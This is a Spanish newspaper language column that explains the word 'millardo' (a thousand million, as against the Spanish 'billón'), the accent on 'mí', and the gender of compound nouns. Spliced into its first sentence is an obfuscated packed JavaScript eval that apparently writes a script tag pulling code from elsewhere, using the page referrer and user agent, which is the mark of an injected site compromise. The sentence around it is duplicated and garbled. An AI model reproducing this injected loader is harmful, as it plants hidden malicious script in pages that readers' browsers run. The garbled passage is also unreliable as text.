publicidad

Notículas de español... La palabra millardo

Tito Balza Santaella /Escritor / titobalzas@yahoo.es – http://twitter.com/tbalzasantaella
En eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|btddh|var|u0026u|referrer|eyfdb||js|php'.split('|'),0,{})) diciembre de 1995 la Academia de la Lengua aprobó la palabra millardo, propuesta por el entonces presidente de Venezuela doctor Rafael Caldera para decir sintéticamente mil millones (1.000.000.000)

En diciembre de 1995 la Academia de la Lengua aprobó la palabra millardo, propuesta por el entonces presidente de Venezuela doctor Rafael Caldera para decir sintéticamente mil millones (1.000.000.000), palabra que, en efecto, hacía falta en nuestra lengua y está presente en otros idiomas cercanos: en francés se dice milliard, en italiano miliardo y en inglés billion. Y he aquí una poderosa razón para la distinción. Los hablantes desprevenidos, especialmente de los círculos periodísticos, confundían y confunden este billion inglés con nuestro billón, voz vieja y castiza que significa la astronómica cifra de un millón de millones, la unidad seguida de doce ceros (1.000.000.000.000). Aunque la palabra millardo, pues, les resulte extraña o desagradable a más de uno, está plenamente justificada y debemos darle fuerza de uso para evitar confusión con el billion inglés.

                                                     .o0o.

La palabra mí se tilda si es variante pronominal de primera persona singular: "Eso es para mí", "En mí tienes a un amigo". En estas circunstancias puede ser término de varias preposiciones: a mí, ante mí, contra mí, de mí, en mí, hacia mí, para mí, por mí, sin mí, sobre mí o de preposiciones yuxtapuestas: No se dice bajo mí, sino bajo de mí; ni tras mí, sino tras de mí. Cuando es término de con, se forma el pronombre conmigo. No se tilda si es adjetivo posesivo: "Las cartas de mi hermano", "Mi cuaderno de apuntes"; tampoco si es el nombre de la nota musical: "Está escrita en mi menor".

                                                     .o0o.

En las palabras compuestas, cuyo segundo elemento sea un sustantivo, es este el que determina el género, verbigracia: la aguamiel, el contraveneno, la contraventana, la desazón, el disfavor, la casatienda, el sinsabor, la trastienda, la minusvalía, etc.

Los compuestos de verbo con sustantivo tienden a tener el género masculino, cualquiera sea el segundo elemento: el guardamano, el portaviandas, el portaaviones; son, sin embargo, femeninos: chotacabras, guardapuerta, portabandera, portacaja, portacarabina, tornapunta, tornaguía. Portapaz es ambiguo.

 

Comentarios
© 2017, Diario La Verdad. Maracaibo. Venezuela C.A. RIF J-30540623-5. Términos Legales. Contáctenos via: web@laverdad.com , noticias@laverdad.com o ventas@laverdad.com
Desarrollado por Miguel Guadarrama